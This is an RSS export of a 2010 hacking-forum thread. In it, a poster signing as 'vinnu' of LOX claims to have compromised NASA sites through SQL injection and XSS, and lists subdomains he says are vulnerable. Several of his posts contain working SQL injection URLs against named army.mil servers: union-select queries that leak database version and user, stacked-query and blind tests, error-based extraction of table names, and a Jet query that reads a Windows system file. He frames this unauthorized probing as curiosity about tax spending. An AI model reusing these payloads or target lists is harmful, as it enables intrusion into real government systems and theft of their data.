<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>NASA exploitation by complex SQL injection...&amp;quot;vinnu&amp;quot;</title>
        <description>Jaijeya
I am exploring NASA for SQL injections and XSS since mid January and to my wonder every 3 minutes I've discovered a new SQL injection vulnerability or XSS.
The SQL injection allowed me to access user credentials, File System and internal networks and precious information from their servers.

The database servers deployed by them vary to nearly all type of servers on different systems like Sybase, Oracle, MySQL, SQL server, MS-Access, NoSQL etc.

Some of vulnerable NASA subdomains are:


www.jpl.nasa.gov
pds.jpl.nasa.gov
ssd.jpl.nasa.gov
robotics.nasa.gov
ppj-web-3.jpl.nasa.gov
software.gsfc.nasa.gov
sbir.nasa.gov
science.gsfc.nasa.gov
www.igpp.ucla.edu
directreadout.sci.gsfc.nasa.gov
aerospacescholars.jsc.nasa.gov
www.leadership.nasa.gov
sdo.gsfc.nasa.gov
------
------
------ and so many.
more information is available on Orkut's following community:

http://www.orkut.co.in/Main#CommMsgs?cmm=25319870&amp;amp;tid=5428640088652321772&amp;amp;na=4&amp;amp;nst=28&amp;amp;nid=25319870-5428640088652321772-5431980662675543020


and Penetration pictures can be viewd at:
http://www.orkut.co.in/Main#Album?uid=12341139053341897468&amp;amp;aid=1264214598


&amp;quot;vinnu&amp;quot;
LOX (Legion Of Xtremers)INDIA</description>
        <link>http://sla.ckers.org/forum/read.php?13,33408,33408#msg-33408</link>
        <lastBuildDate>Tue, 21 May 2013 03:36:29 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,33408,33471#msg-33471</guid>
            <title>Re: NASA exploitation by complex SQL injection...&quot;vinnu&quot;</title>
            <link>http://sla.ckers.org/forum/read.php?13,33408,33471#msg-33471</link>
            <description><![CDATA[And now a perfect query:<br />
<br />
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=-5union+all+select+1,@@version,user_name(),suser_name(),@@servername,6,7,8,9,10,11,12,13]]></description>
            <dc:creator>vinnu</dc:creator>
            <category>News and Links</category>
            <pubDate>Tue, 16 Feb 2010 11:50:34 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,33408,33469#msg-33469</guid>
            <title>Re: NASA exploitation by complex SQL injection...&quot;vinnu&quot;</title>
            <link>http://sla.ckers.org/forum/read.php?13,33408,33469#msg-33469</link>
            <description><![CDATA[A blind SQL injection in Pentagon server:<br />
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=59order+by+13<br />
The stacked queries are also working check two cases below if query returns properly it means db engine is Microsoft SQL server:<br />
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@version<br />
and now test this:<br />
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@veion<br />
<br />
<br />
<br />
<br />
<br />
&quot;vinnu&quot;<br />
LOX (Legion Of XCtremers)INDIA]]></description>
            <dc:creator>vinnu</dc:creator>
            <category>News and Links</category>
            <pubDate>Tue, 16 Feb 2010 11:31:12 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,33408,33453#msg-33453</guid>
            <title>Re: NASA exploitation by complex SQL injection...&quot;vinnu&quot;</title>
            <link>http://sla.ckers.org/forum/read.php?13,33408,33453#msg-33453</link>
            <description><![CDATA[Yeah thats right.<br />
Somewhere I read that Pentagons Cyber Security Budget is over 100 million$.<br />
This is a great amount.<br />
Another thing is that actually we talk about home PCs can be used to attack as zombie to other networks, likewise these system's can also be used for further attacks or exploration of their internal networks.<br />
In some of NASA cases same was true, the compromised database allowed me to further enumerate internal network.<br />
<br />
Actually they are doing what is taught are preliminary avoiding terms during learning secure software development. I mean they are employing security at perimeter at some places like HTTP level and not at the application level.<br />
Like in some cases, u can grab information of internal systems or server itself by causing something unexpected like any error and the applications are throwing huge heaps of information enough for an attacker whereas the http filter doesn't stop such outward flow, so at those networks only the invard traffic is analysed.<br />
<br />
Well all in all, we are just curious people and can just attempt ourself to know where is our taxes are actually being used up and how effective.<br />
There is no opposition (of assembly off course) to debate on this or stop this useless expending.]]></description>
            <dc:creator>vinnu</dc:creator>
            <category>News and Links</category>
            <pubDate>Tue, 16 Feb 2010 01:33:04 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,33408,33442#msg-33442</guid>
            <title>Re: NASA exploitation by complex SQL injection...&quot;vinnu&quot;</title>
            <link>http://sla.ckers.org/forum/read.php?13,33408,33442#msg-33442</link>
            <description><![CDATA[Yeah, most folks have enough trouble administrating 1 box (their own) let alone thousands of boxes. There is no way you can secure them all effectively. Imagine the horror of a patch schedule for all those boxes. It would imply they need at least 1 guy administrating 10 to 20 boxes or they loose track. That's a lot of guys, all working in different departments, different skills, no web application skills whatsoever. So I'm guessing they made the trade-of with a security policy where sensitive data is in different more tightly monitored clusters.]]></description>
            <dc:creator>rvdh</dc:creator>
            <category>News and Links</category>
            <pubDate>Mon, 15 Feb 2010 08:27:48 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,33408,33436#msg-33436</guid>
            <title>Re: NASA exploitation by complex SQL injection...&quot;vinnu&quot;</title>
            <link>http://sla.ckers.org/forum/read.php?13,33408,33436#msg-33436</link>
            <description><![CDATA[This is MS Jet database, check the file system access using SQL injection:<br />
<br />
http://www.mepcom.army.mil/publications/results.asp?topic=Forms'+union+select+1,File,Message,Line,Time,6,Tag,8,9,10,11+from+[TEXT;DATABASE=c:%5Cwindows;HDR=YES;FMT=Delimited].[setuplog.txt]'&amp;pubNo=&amp;date1=&amp;date2=&amp;pubDesc=]]></description>
            <dc:creator>vinnu</dc:creator>
            <category>News and Links</category>
            <pubDate>Mon, 15 Feb 2010 00:46:17 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,33408,33435#msg-33435</guid>
            <title>Re: NASA exploitation by complex SQL injection...&quot;vinnu&quot;</title>
            <link>http://sla.ckers.org/forum/read.php?13,33408,33435#msg-33435</link>
            <description><![CDATA[Yes thats right.<br />
I think now they should prepare a virus like in Terminator movie to administer their huge networks automatically and that can learn and identify the problems and fix them automatically.]]></description>
            <dc:creator>vinnu</dc:creator>
            <category>News and Links</category>
            <pubDate>Sun, 14 Feb 2010 23:37:06 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,33408,33426#msg-33426</guid>
            <title>Re: NASA exploitation by complex SQL injection...&quot;vinnu&quot;</title>
            <link>http://sla.ckers.org/forum/read.php?13,33408,33426#msg-33426</link>
            <description><![CDATA[Yes this has been the case for ages on their networks, apparently they simply gave up administrating tons of boxes all over the place, somehow I can relate.]]></description>
            <dc:creator>rvdh</dc:creator>
            <category>News and Links</category>
            <pubDate>Sun, 14 Feb 2010 16:46:01 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,33408,33425#msg-33425</guid>
            <title>Pentagone SQL Injection</title>
            <link>http://sla.ckers.org/forum/read.php?13,33408,33425#msg-33425</link>
            <description><![CDATA[Check following error based injection:<br />
<br />
https://www.dms.army.mil/acro_list.cfm?startrow=30&amp;orderby=cast((select+top+1+substring(name,1,600)+from+sysobjects+order+by+NEWID())+as+int)&amp;sort=&amp;clear=true]]></description>
            <dc:creator>vinnu</dc:creator>
            <category>News and Links</category>
            <pubDate>Sun, 14 Feb 2010 13:43:33 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?13,33408,33408#msg-33408</guid>
            <title>NASA exploitation by complex SQL injection...&quot;vinnu&quot;</title>
            <link>http://sla.ckers.org/forum/read.php?13,33408,33408#msg-33408</link>
            <description><![CDATA[Jaijeya<br />
I am exploring NASA for SQL injections and XSS since mid January and to my wonder every 3 minutes I've discovered a new SQL injection vulnerability or XSS.<br />
The SQL injection allowed me to access user credentials, File System and internal networks and precious information from their servers.<br />
<br />
The database servers deployed by them vary to nearly all type of servers on different systems like Sybase, Oracle, MySQL, SQL server, MS-Access, NoSQL etc.<br />
<br />
Some of vulnerable NASA subdomains are:<br />
<br />
<br />
www.jpl.nasa.gov<br />
pds.jpl.nasa.gov<br />
ssd.jpl.nasa.gov<br />
robotics.nasa.gov<br />
ppj-web-3.jpl.nasa.gov<br />
software.gsfc.nasa.gov<br />
sbir.nasa.gov<br />
science.gsfc.nasa.gov<br />
www.igpp.ucla.edu<br />
directreadout.sci.gsfc.nasa.gov<br />
aerospacescholars.jsc.nasa.gov<br />
www.leadership.nasa.gov<br />
sdo.gsfc.nasa.gov<br />
------<br />
------<br />
------ and so many.<br />
more information is available on Orkut's following community:<br />
<br />
http://www.orkut.co.in/Main#CommMsgs?cmm=25319870&amp;tid=5428640088652321772&amp;na=4&amp;nst=28&amp;nid=25319870-5428640088652321772-5431980662675543020<br />
<br />
<br />
and Penetration pictures can be viewd at:<br />
http://www.orkut.co.in/Main#Album?uid=12341139053341897468&amp;aid=1264214598<br />
<br />
<br />
&quot;vinnu&quot;<br />
LOX (Legion Of Xtremers)INDIA]]></description>
            <dc:creator>vinnu</dc:creator>
            <category>News and Links</category>
            <pubDate>Sat, 13 Feb 2010 00:12:00 -0600</pubDate>
        </item>
    </channel>
</rss>
